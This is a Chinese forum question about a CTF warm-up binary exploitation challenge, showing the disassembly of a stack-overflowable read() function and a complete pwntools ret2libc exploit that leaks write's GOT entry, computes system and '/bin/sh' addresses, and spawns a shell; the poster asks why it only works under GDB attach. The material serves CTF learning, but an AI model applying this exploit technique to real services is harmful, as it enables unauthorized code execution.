极客观点
项目管理
HarmonyOS
一个十分简单的pwn热手题,用GDB attach调试可以正常get shell,但是直接运行或者远程连接都不行,有人遇到过类似的情况吗?
漏洞点
080484eb <foo>:
80484eb: 55 push %ebp
80484ec: 89 e5 mov %esp,%ebp
80484ee: 83 ec 28 sub $0x28,%esp
80484f1: c7 45 e4 00 00 00 00 movl $0x0,-0x1c(%ebp)
80484f8: c7 45 e8 00 00 00 00 movl $0x0,-0x18(%ebp)
80484ff: c7 45 ec 00 00 00 00 movl $0x0,-0x14(%ebp)
8048506: c7 45 f0 00 00 00 00 movl $0x0,-0x10(%ebp)
804850d: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp)
8048514: 83 ec 04 sub $0x4,%esp
8048517: 68 00 02 00 00 push $0x200
804851c: 8d 45 e4 lea -0x1c(%ebp),%eax
804851f: 50 push %eax
8048520: 6a 00 push $0x0
8048522: e8 89 fe ff ff call 80483b0 <read@plt>
8048527: 83 c4 10 add $0x10,%esp
804852a: 83 ec 04 sub $0x4,%esp
804852d: 6a 14 push $0x14
804852f: 8d 45 e4 lea -0x1c(%ebp),%eax
8048532: 50 push %eax
8048533: 6a 01 push $0x1
8048535: e8 a6 fe ff ff call 80483e0 <write@plt>
804853a: 83 c4 10 add $0x10,%esp
804853d: 90 nop
804853e: c9 leave
804853f: c3 ret exp直接就可以写出来了
#coding: utf-8
from pwn import *
# p=remote("172.17.0.2",2333)
p=process("./pwn3")
pwn_elf=ELF("./pwn3")
so_elf=ELF("./libc.so.6")
payload="a"*32
payload+=p32(pwn_elf.symbols['write'])
payload+=p32(pwn_elf.symbols['foo'])
payload+=p32(1)+p32(pwn_elf.got['write'])+p32(4)
print pwn_elf.symbols['write']
# raw_input("aa")
p.sendline(payload)
p.recv()
_write=p.recv() #这里没有得到注入的write输出
write_offset=u32(_write[-4:])-so_elf.symbols['write']
sys_ram_addr=write_offset+so_elf.symbols['system']
sh_ram_addr=write_offset+so_elf.search('/bin/sh').next()
payload="a"*32
payload+=p32(sys_ram_addr)
payload+='\x12\x12\x12\x12'
payload+=p32(sh_ram_addr)
p.sendline(payload)
p.interactive()一开始是用docker模拟的一个ubuntu环境,用socat向外开放2333端口,然后用远程pwn的,到了拿_write的时候没有输出
然后就到本地直接跑,还是到了拿_write的时候卡住,又试了本地socat,也还是这样
然后我本地跑,人工加了个断点(raw_input),然后直接gdb attach这个进程,然后就正常getshell.....
然后我又调试了一遍,每个寄存器的变化都是意料之中的,也是可以getshell,但是只要我不用gdb去attach,就是在拿_write的时候卡住,没有拿到输入
求解为什么?应该是输入输出逻辑的问题,但是为什么GDB attach之后就是好了
python
Google is your friend 看这里